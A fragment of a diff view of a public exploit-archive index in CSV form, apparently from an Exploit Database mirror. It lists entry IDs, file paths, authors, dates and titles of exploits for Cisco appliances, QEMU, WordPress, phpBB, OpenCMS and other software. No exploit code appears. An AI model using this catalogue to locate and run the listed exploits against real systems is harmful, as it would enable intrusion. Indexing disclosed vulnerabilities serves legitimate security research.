47313,exploits/multiple/remote/47313.txt,"Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities",2019-08-21,"Pedro Ribeiro",remote,multiple,
|
||||
47320,exploits/linux/remote/47320.c,"QEMU - Denial of Service",2019-08-20,vishnudevtj,remote,linux,
|
||||
47329,exploits/hardware/remote/47329.pl,"Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection",2019-09-02,"Todor Donev",remote,hardware,
|
||||
47337,exploits/hardware/remote/47337.pl,"IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read",2019-09-02,"Todor Donev",remote,hardware,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -41684,3 +41690,9 @@ id,file,description,date,author,type,platform,port
|
|||
47325,exploits/php/webapps/47325.txt,"DomainMod 4.13 - Cross-Site Scripting",2019-08-30,"Damian Ebelties",webapps,php,
|
||||
47326,exploits/php/webapps/47326.txt,"YouPHPTube 7.4 - Remote Code Execution",2019-08-30,"Damian Ebelties",webapps,php,80
|
||||
47327,exploits/php/webapps/47327.txt,"WordPress Plugin WooCommerce Product Feed 2.2.18 - Cross-Site Scripting",2019-08-30,"Damian Ebelties",webapps,php,80
|
||||
47331,exploits/php/webapps/47331.txt,"Opencart 3.x - Cross-Site Scripting",2019-09-02,"Nipun Somani",webapps,php,
|
||||
47335,exploits/php/webapps/47335.txt,"Wordpress Plugin Event Tickets 4.10.7.1 - CSV Injection",2019-09-02,MTK,webapps,php,
|
||||
47338,exploits/multiple/webapps/47338.txt,"Alkacon OpenCMS 10.5.x - Cross-Site Scripting",2019-09-02,Aetsu,webapps,multiple,
|
||||
47339,exploits/multiple/webapps/47339.txt,"Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)",2019-09-02,Aetsu,webapps,multiple,
|
||||
47340,exploits/multiple/webapps/47340.txt,"Alkacon OpenCMS 10.5.x - Local File inclusion",2019-09-02,Aetsu,webapps,multiple,
|
||||
47343,exploits/php/webapps/47343.txt,"Craft CMS 2.7.9/3.2.5 - Information Disclosure",2019-09-02,"Mohammed Abdul Raheem",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue